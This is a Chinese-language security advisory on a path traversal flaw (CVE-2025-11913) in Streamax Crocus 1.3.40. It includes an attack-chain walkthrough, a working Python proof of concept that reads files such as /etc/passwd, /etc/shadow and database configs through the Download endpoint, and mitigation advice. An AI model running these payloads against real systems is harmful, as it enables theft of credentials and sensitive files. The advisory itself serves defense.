CVE-2025-11913：Streamax Crocus路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-11913

漏洞类型

路径遍历（Path Traversal）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shenzhen Ruiming Technology Streamax Crocus

漏洞概述

CVE-2025-11913是深圳市锐明技术股份有限公司（CroCus系统）中存在的一个路径遍历漏洞，影响Streamax Crocus 1.3.40版本。该漏洞存在于文件/Service.do的Download功能（Action=Download）中，攻击者可以通过操控Path参数实现路径遍历攻击，从而访问服务器上的任意文件。

该漏洞的CVSS 3.1评分为4.3，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。在影响方面，该漏洞仅对机密性产生低影响（C:L），对完整性和可用性无影响（I:N/A:N）。这意味着该漏洞主要用于未授权读取敏感文件，而非破坏系统或获取更高权限。

该漏洞已于2025年10月17日公开披露，且利用代码已在GitHub等公开渠道发布。值得注意的是，漏洞发现者在披露前曾联系厂商，但厂商未做出任何回应，这增加了该漏洞被恶意利用的风险。路径遍历漏洞通常被攻击者用于读取配置文件、数据库凭证、日志文件等敏感信息，为后续攻击提供情报支持。

技术细节

路径遍历（Path Traversal），又称目录遍历（Directory Traversal），是一种允许攻击者访问Web服务器文件系统中超出Web根目录的任意文件的安全漏洞。在CVE-2025-11913中，漏洞存在于Streamax Crocus 1.3.40的/Service.do?Action=Download接口。

具体技术原理如下：
1. 应用程序的Download功能接收用户传入的Path参数，用于指定要下载的文件路径；
2. 应用程序未对用户输入的Path参数进行充分的过滤和验证，未限制其访问特定目录；
3. 攻击者可以通过在Path参数中注入../（相对路径）或使用绝对路径等方式，绕过应用程序的目录限制；
4. 例如，正常的请求可能是/Service.do?Action=Download&Path=config.txt，但攻击者可以构造/Service.do?Action=Download&Path=../../../etc/passwd或/Service.do?Action=Download&Path=../../windows/win.ini等恶意请求；
5. 服务器根据被篡改的路径返回敏感文件内容，导致信息泄露。

该漏洞的利用条件相对简单：攻击者只需要拥有低权限的认证账户（PR:L），通过网络即可发起攻击，无需用户交互。由于攻击复杂度低（AC:L），且漏洞利用代码已公开，攻击者可以轻松实施攻击。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为Streamax Crocus 1.3.40版本，通过网络扫描或指纹识别确认目标系统的类型和版本。

STEP 2

步骤2：获取低权限凭证

攻击者通过社会工程、凭证填充（Credential Stuffing）或其他方式获取目标系统的低权限用户账号。

STEP 3

步骤3：身份认证

攻击者使用获取的低权限凭证登录到Streamax Crocus系统，建立有效的会话。

STEP 4

步骤4：构造恶意请求

攻击者构造包含路径遍历Payload的HTTP请求，例如：/Service.do?Action=Download&Path=../../../etc/passwd

STEP 5

步骤5：发送攻击请求

攻击者通过认证的会话发送恶意请求到存在漏洞的Download接口。

STEP 6

步骤6：获取敏感文件

服务器响应并返回被遍历访问的敏感文件内容，如系统配置文件、数据库凭证、用户信息等。

STEP 7

步骤7：信息利用

攻击者利用获取的敏感信息进行进一步的攻击，如权限提升、横向移动或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11913 - Streamax Crocus Path Traversal PoC
# Vulnerability: Path Traversal in Download function
# Affected endpoint: /Service.do?Action=Download
# Affected parameter: Path
# Affected version: Streamax Crocus 1.3.40

import requests

# Target configuration
TARGET_URL = "http://target-host"
LOGIN_URL = f"{TARGET_URL}/login.do"  # Adjust login endpoint as needed
DOWNLOAD_URL = f"{TARGET_URL}/Service.do?Action=Download"

# Authentication credentials (low privilege account required)
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Create session to maintain cookies
session = requests.Session()

def authenticate():
    """Authenticate with the target system using low privilege credentials"""
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(LOGIN_URL, data=login_data)
    if response.status_code == 200:
        print("[+] Authentication successful")
        return True
    print("[-] Authentication failed")
    return False

def exploit_path_traversal(target_file):
    """
    Exploit path traversal vulnerability to read arbitrary files
    :param target_file: The file path to read (e.g., "../../../etc/passwd")
    """
    # Construct malicious Path parameter with directory traversal
    payload = {
        "Path": target_file
    }
    
    response = session.get(DOWNLOAD_URL, params=payload)
    
    if response.status_code == 200 and len(response.content) > 0:
        print(f"[+] Successfully read file: {target_file}")
        print(f"[+] File content:\n{response.text[:500]}")
        return response.text
    else:
        print(f"[-] Failed to read file: {target_file}")
        return None

def main():
    # Step 1: Authenticate
    if not authenticate():
        return
    
    # Step 2: Exploit path traversal to read sensitive files
    # Linux/Unix targets
    target_files = [
        "../../../etc/passwd",
        "../../../etc/shadow",
        "../../../etc/hosts",
        "../../../../../../etc/passwd",
        # Windows targets
        "..\\..\\..\\..\\windows\\win.ini",
        "..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        # Application configuration files
        "../../../WEB-INF/web.xml",
        "../../../conf/database.properties",
        "../config/application.yml"
    ]
    
    for target_file in target_files:
        content = exploit_path_traversal(target_file)
        if content:
            break

if __name__ == "__main__":
    main()

影响范围

Shenzhen Ruiming Technology Streamax Crocus 1.3.40

防御指南

临时缓解措施

在等待厂商发布安全补丁期间，建议采取以下临时缓解措施：1）对/Service.do?Action=Download接口实施访问控制，限制仅特定IP地址或用户组可访问；2）在Web服务器层面部署WAF规则，拦截包含../或..\等路径遍历特征的请求；3）修改应用代码，对Path参数进行严格的白名单验证，仅允许访问预设的安全目录；4）监控Download接口的访问日志，发现异常的文件访问请求及时告警和处理；5）限制Web应用进程的文件系统访问权限，使用chroot或容器技术隔离应用环境；6）及时更改可能已泄露的凭证，避免攻击者利用已获取的凭证进行攻击。